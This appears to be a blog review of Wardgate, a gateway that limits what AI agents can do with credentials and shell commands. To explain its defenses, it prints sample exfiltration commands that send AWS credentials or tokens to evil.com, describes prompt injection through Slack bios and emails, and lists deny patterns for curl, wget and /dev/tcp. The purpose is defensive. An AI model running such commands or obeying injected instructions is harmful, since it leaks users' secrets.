Wardgate: A Security Gateway That Keeps Your AI Agents from Leaking Credentials
Hook
Your AI assistant just executed curl https://evil.com?data=$(cat ~/.aws/credentials) because someone embedded a malicious instruction in their Slack bio. This is the prompt injection problem, and it’s worse than you think.
Context
AI agents are becoming the next frontier of software automation—autonomous systems that read your emails, manage your calendar, commit code to GitHub, and execute shell commands on your behalf. But there’s a fundamental security problem: these agents need credentials to do anything useful, and the moment you hand credentials to an agent, you’re trusting not just the agent’s code but every piece of external data it processes. A cleverly crafted email subject line, a malicious API response, or even a poisoned search result can trick an agent into exfiltrating secrets, deleting production databases, or pivoting into your infrastructure.
The traditional solution—“just sandbox everything”—doesn’t work well for agents that need to interact with real systems. You can’t put your production GitHub API in a sandbox. You can’t firewall off Gmail when your agent needs to send emails. What you need is a way to give agents capabilities without giving them credentials, and a way to limit what they can do even when they’re compromised. That’s the problem Wardgate solves. It’s a security gateway written in Go that sits between your AI agents and the outside world, intercepting requests, injecting credentials server-side, and enforcing granular policies on what agents can actually do.
Technical Insight
Wardgate implements two distinct security mechanisms that work in concert: API proxying for HTTP/SMTP/IMAP/SSH connections, and conclaves for remote command execution. Let’s start with the API gateway, which is the simpler of the two.
The API proxy model is straightforward: instead of giving your agent a GitHub personal access token, you configure Wardgate with an endpoint definition that maps a proxy path to the real API. Your agent makes requests to http://wardgate:8080/github/* and Wardgate forwards them to https://api.github.com/*, injecting the PAT server-side. Here’s what a basic endpoint configuration looks like:
endpoints:
  - name: github-repos
    path: /github/*
    target: https://api.github.com
    credentials:
      type: bearer
      token_env: GITHUB_TOKEN
    policies:
      - allow_methods: [GET, POST, PATCH]
      - deny_paths: ["/user/keys", "/repos/*/hooks"]
      - require_approval_for: ["/repos/*/collaborators/*"]
This configuration lets an agent read and modify repository content, blocks it outright from adding SSH keys or creating webhooks, and requires human approval before it can add collaborators. The agent never sees the token: it just makes HTTP requests to Wardgate, which handles authentication transparently. If someone tricks your agent into calling curl -H "Authorization: Bearer $TOKEN" https://evil.com, nothing leaks, because $TOKEN doesn’t exist in the agent’s environment.
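To make the proxy flow concrete (strip the proxy prefix, evaluate the policy, then attach the token on the server side), here is a minimal Python sketch. It is not Wardgate's implementation: the ENDPOINT dict, decide, and build_upstream are hypothetical names that mirror the example config, and the glob matching uses Python's fnmatch, where * also matches across / boundaries, which may differ from Wardgate's own matcher.

```python
import os
from fnmatch import fnmatchcase

# Hypothetical in-memory mirror of the example endpoint config; the field
# names follow the article's YAML, not a confirmed Wardgate schema.
ENDPOINT = {
    "path_prefix": "/github",
    "target": "https://api.github.com",
    "token_env": "GITHUB_TOKEN",
    "allow_methods": {"GET", "POST", "PATCH"},
    "deny_paths": ["/user/keys", "/repos/*/hooks"],
    "require_approval_for": ["/repos/*/collaborators/*"],
}


def decide(endpoint, method, path):
    """Return 'deny', 'approve', or 'allow' for a path with the prefix removed."""
    if method.upper() not in endpoint["allow_methods"]:
        return "deny"
    if any(fnmatchcase(path, pat) for pat in endpoint["deny_paths"]):
        return "deny"
    if any(fnmatchcase(path, pat) for pat in endpoint["require_approval_for"]):
        return "approve"
    return "allow"


def build_upstream(endpoint, method, proxy_path, agent_headers, env=os.environ):
    """Map a proxy path to the real API and attach the server-side token."""
    prefix = endpoint["path_prefix"]
    if not proxy_path.startswith(prefix + "/"):
        raise ValueError("path is not served by this endpoint")
    path = proxy_path[len(prefix):]
    verdict = decide(endpoint, method, path)
    if verdict != "allow":
        return verdict, None
    # Drop any Authorization header the agent supplied, then inject our own.
    headers = {k: v for k, v in agent_headers.items() if k.lower() != "authorization"}
    headers["Authorization"] = "Bearer " + env[endpoint["token_env"]]
    upstream = {
        "method": method.upper(),
        "url": endpoint["target"] + path,
        "headers": headers,
    }
    return verdict, upstream
```

The token is read only inside build_upstream, so it exists in the gateway's environment and never in anything returned to the agent. Checks run from most to least restrictive, so a denied path can never be rescued by an approval rule.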
The more interesting architecture is conclaves, which are Wardgate’s answer to shell command execution. When you need an agent to run commands—say, to clone a repo, run tests, or process files—you don’t want to give it unrestricted shell access. Conclaves provide isolated execution environments where commands are policy-gated before execution.
Here’s how it works: you run wardgate conclave create myproject to spin up an isolated environment (typically a Docker container with no outbound network access). The agent doesn’t get shell access or SSH keys. Instead, it uses wardgate-cli to submit commands:
# Agent uses wardgate-cli instead of direct shell access
wardgate-cli exec myproject -- git clone https://github.com/user/repo
wardgate-cli exec myproject -- make test
wardgate-cli exec myproject -- cat results.txt
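For the isolation half of this flow, one way to picture a conclave is as a long-lived Docker container started without networking, with each submitted command run inside it. The sketch below only builds the docker command lines and does not run them. The helper names, the /workspace default, and the sleep infinity keep-alive are assumptions for illustration; how Wardgate actually launches containers is not described here.

```python
import shlex


def run_argv(name, image, workdir="/workspace", keepalive=("sleep", "infinity")):
    """Build a `docker run` argv for a detached container with no network."""
    return [
        "docker", "run", "-d",
        "--name", name,
        "--network", "none",   # container gets no network interfaces beyond loopback
        "--workdir", workdir,
        image,
        *keepalive,            # assumed keep-alive process so later exec calls work
    ]


def exec_argv(name, command, workdir="/workspace"):
    """Build a `docker exec` argv that runs one command without a shell."""
    # shlex.split turns the command into an argv list, so operators such as
    # && or | reach the program as plain arguments instead of being interpreted.
    return ["docker", "exec", "--workdir", workdir, name, *shlex.split(command)]
```

Passing an argv list rather than a shell string is a deliberate choice in this sketch: it keeps the policy check and the thing actually executed in agreement.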
Each command is evaluated against policies defined in your wardgate config. The policy engine is sophisticated enough to parse shell pipelines and evaluate each component:
conclaves:
  - name: myproject
    policies:
      - allow_commands: [git, make, cat, ls, grep]
      - deny_patterns:
          - "curl *"
          - "wget *"
          - "* > /dev/tcp/*"
      - restrict_working_dirs: ["/workspace"]
      - require_approval_for:
          - "git push *"
          - "make deploy"
The really clever bit is how Wardgate handles command chains. If an agent tries to run git clone repo && curl evil.com?data=$(cat secrets), Wardgate parses the chain, sees the curl command, and blocks the entire operation even though git clone on its own would have been allowed. This prevents agents from using shell operators such as &&, ;, or | to smuggle a forbidden command in behind a permitted one.
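The idea of checking every component of a chain can be sketched as follows. This is a deliberately naive illustration under stated assumptions, not Wardgate's parser: it splits on shell operators with a regular expression and ignores quoting, so it fails closed on input it cannot parse. ALLOW_COMMANDS and DENY_PATTERNS are copied from the example policy, and split_commands and check are hypothetical names.

```python
import re
import shlex
from fnmatch import fnmatchcase

ALLOW_COMMANDS = {"git", "make", "cat", "ls", "grep"}
DENY_PATTERNS = ["curl *", "wget *", "* > /dev/tcp/*"]

# Anything that can start another command: &&, ||, ;, |, &, newline,
# backticks, subshell parentheses, and $( ... ) command substitution.
_SPLIT = re.compile(r"&&|\|\||[;|&\n`()]|\$\(")


def split_commands(line):
    """Naively break a shell line into its individual simple commands."""
    return [part.strip() for part in _SPLIT.split(line) if part.strip()]


def check(line):
    """Return (allowed, reason); one bad component blocks the whole line."""
    if any(fnmatchcase(line, pat) for pat in DENY_PATTERNS):
        return False, "line matches a deny pattern"
    commands = split_commands(line)
    if not commands:
        return False, "empty command"
    for cmd in commands:
        try:
            argv = shlex.split(cmd)
        except ValueError:
            # Unbalanced quotes, often caused by the naive split: fail closed.
            return False, f"unparseable component: {cmd!r}"
        if not argv or argv[0] not in ALLOW_COMMANDS:
            return False, f"command not allowed: {cmd!r}"
        if any(fnmatchcase(cmd, pat) for pat in DENY_PATTERNS):
            return False, f"deny pattern matched: {cmd!r}"
    return True, "ok"
```

With this sketch, check("make test | grep FAIL") passes, while the git clone and curl chain from the paragraph above is rejected at the curl component. The trade-off of the naive split is false positives: a harmless grep "a|b" file is also rejected because the quoted | is treated as an operator. A real implementation would need a proper shell grammar.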
Wardgate also includes a library of presets for popular services (Todoist, Google Calendar, Linear, and more) so you don’t have to hand-craft API policies from scratch. The presets aim to balance security with usability: the GitHub preset, for example, allows read access to most endpoints but requires approval for anything that modifies organization settings or adds external integrations.
The audit trail is comprehensive. Every request goes through a structured logger that captures the agent identity, the original request, policy evaluations, and the final outcome. For operations requiring approval, Wardgate can pause execution and send notifications via webhook or email, waiting for a human to approve or deny the action through a simple CLI command.
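As a rough picture of what such a record and approval step might look like, here is a small Python sketch. The JSON field names, audit_record, and ApprovalQueue are all hypothetical and do not reflect Wardgate's actual log format or approval mechanism. The sketch only illustrates the shape: one structured line per decision, and a pending ticket that a human later resolves.

```python
import json
import uuid
from datetime import datetime, timezone


def audit_record(agent, request, evaluations, outcome, now=None):
    """Serialize one gateway decision as a single JSON line."""
    ts = now or datetime.now(timezone.utc)
    record = {
        "time": ts.isoformat(),
        "agent": agent,
        "request": request,
        "policy_evaluations": evaluations,
        "outcome": outcome,
    }
    return json.dumps(record, sort_keys=True)


class ApprovalQueue:
    """Holds requests that a policy marked as needing human approval."""

    def __init__(self):
        self._pending = {}

    def submit(self, agent, request):
        """Park a request and return a ticket id to include in the notification."""
        ticket = uuid.uuid4().hex
        self._pending[ticket] = {"agent": agent, "request": request}
        return ticket

    def resolve(self, ticket, approved):
        """Record the human decision; raises KeyError for unknown or reused tickets."""
        item = self._pending.pop(ticket)
        decision = "approved" if approved else "denied"
        evaluations = [{"rule": "require_approval_for", "result": "human " + decision}]
        outcome = "allowed" if approved else "denied"
        return audit_record(item["agent"], item["request"], evaluations, outcome)
```

Removing the ticket on resolve means an approval can be used exactly once, so a replayed approval message cannot release a second request.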
Gotcha
Wardgate is not a drop-in solution—it requires substantial infrastructure work and careful planning. You need to run and maintain a Wardgate server (or cluster for HA), manage YAML configurations for every service your agents access, and potentially modify your agent code to use wardgate-cli instead of direct system calls. For simple projects or proof-of-concept agents, this overhead is probably not justified.
The conclave model also has limitations. Container startup time adds latency to every command execution, which can be frustrating for interactive agent workflows. Network isolation means your conclave can’t make API calls unless you explicitly proxy them through Wardgate endpoints, which creates a bootstrapping problem if your build process needs to download dependencies from npm, PyPI, or Docker Hub. You can allowlist specific domains, but then you’re back to managing security policies, just at the network level instead of the credential level. The project is also relatively young, with 104 stars, which means documentation gaps, potential bugs, and best practices that are still evolving. If you hit an edge case, you might be on your own.
Verdict
Use Wardgate if you’re deploying AI agents that need access to production systems, personal accounts with sensitive data, or any environment where prompt injection could cause real damage. It’s ideal for personal AI assistants managing email and calendar, development agents with repository access, or autonomous systems that need to execute commands but shouldn’t have unrestricted shell access. The audit trail alone is worth it for regulated industries where you need provenance for every agent action.
Skip it if you’re building proof-of-concept agents, working in fully sandboxed test environments with throwaway credentials, or if your agents only need read-only access to public APIs where the blast radius is minimal. Also skip it if you need ultra-low latency or your team doesn’t have the operational capacity to run and maintain another piece of infrastructure.
Wardgate is a power tool for security-conscious developers who understand that agent safety is an infrastructure problem, not just a prompt engineering problem.